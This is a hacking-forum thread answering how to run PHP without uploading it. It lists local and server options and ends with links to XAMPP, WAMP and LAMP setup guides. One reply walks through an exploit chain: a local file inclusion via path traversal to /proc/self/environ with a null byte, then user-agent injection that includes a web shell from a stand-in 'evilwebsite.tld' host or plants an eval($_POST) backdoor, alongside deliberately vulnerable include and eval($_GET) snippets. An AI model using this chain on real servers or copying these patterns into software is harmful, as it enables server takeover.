php script question

[HaxJester]

Is it possible to run php scripts be run without having to save them online first?

[-Ninjex-]

Is it possible to run php scripts be run without having to save them online first?

Of course, maybe research your question on google first.
If you are really confused, look into apache servers.

[weekend hacker]

You can run php in various ways on whatever machine that has php installed. The main thing is that the code will run on a machine that has it installed, the actual location of the code doesn't matter all that much depending on the context.
You could for instance install php on your home machine and start from the command line like:

Code: Select all

php somephpfile.php

Or you could also have a webserver installed with php support and simply go to the appropriate url like:

Code: Select all

http://127.0.0.1/somephpfile.php

Or on a remote server with php installed there could be a php script that includes other php code and the php installed on that server has been configured to allow remote includes like:

Code: Select all

<?php include 'http://somewebsite.tld/somedir/somefile.php'; ?>

(note that somewebsite.tld/.... needs to show the content of that php file and not actually run it itself. it doesn't even really need to end in .php it might aswell be a .txt)
Or there might be some php code on a machine that allows you to evaluate php code and allows you to specify a string of php code like:

Code: Select all

<?php eval($_GET['code']); ?>

Now to throw all this together into a practical example.. There might be a php script somewhere that is vulnerable to a local file inclusion (lfi). It might look something like this:

Code: Select all

<?php include '/usr/local/www/'.$_GET['page'].'.php';

now we could change the 'page' get value to whatever we want fairly easy by just going to some url like:

Code: Select all

http://somewebsite.tld/vulnpage.php?page=../../../proc/self/environ%00

then the vuln page will try to include /proc/self/environ.(note the nullbyte at the end to get rid of that pesky .php)
Now if we ware to also change our useragent to something like:

Code: Select all

<?php include 'evilwebsite.tld/somephpshell.txt'; ?>

then the vuln page will include /proc/self/environ which for a web process also contains the user agent which will in turn be treated as php code and will include somephpshell.txt (assuming remote includes are turned on). if somephpshell.txt is the code for a random php shell then you now have a nice interface to whatever server that had the lfi as whatever user the webserver is running as.
Now if remote includes are not allowed then you could always turn your useragent into something like:

Code: Select all

<?php eval($_POST['evilcodez']); ?>

and set the post value of 'evilcodez' to the content of the shellscript. or alternativly you write a little something to get the shellscript from some server(http_get() comes to mind but if remote includes are disabled then they theres a big change that is disabled aswel).

There you have it, various ways of running php in all kinds of situations with the actual code being in all kinds of different places. Hope this helped.

[Fehk]

On top of the numerous 'delivery methods' above, there are plenty of applications, guides and software to help you install, customize and run your own test server on your PC.

1. XAMPP, cross-platform apache/mysql/php & perl

http://www.webassist.com/support/docume ... indows.php (great allround usage)

2. WAMP, windows apache/mysql/php

http://www.wampserver.com/en/ (apache2, easy to work with, great customization)
http://www.easyphp.org/ (very easy :p use it myself on both laptop and pc)

3. LAMP, linux apache/mysql/php

Setting up a LAMP is a bit harder, since you have to do more manual work instead of clicking 'next' & 'finish', but it's very rewarding if you do set one up.

https://help.ubuntu.com/community/ApacheMySQLPHP (for ubuntu, a 'how-to')
http://www.redips.net/linux/lamp-setup/ (same thing)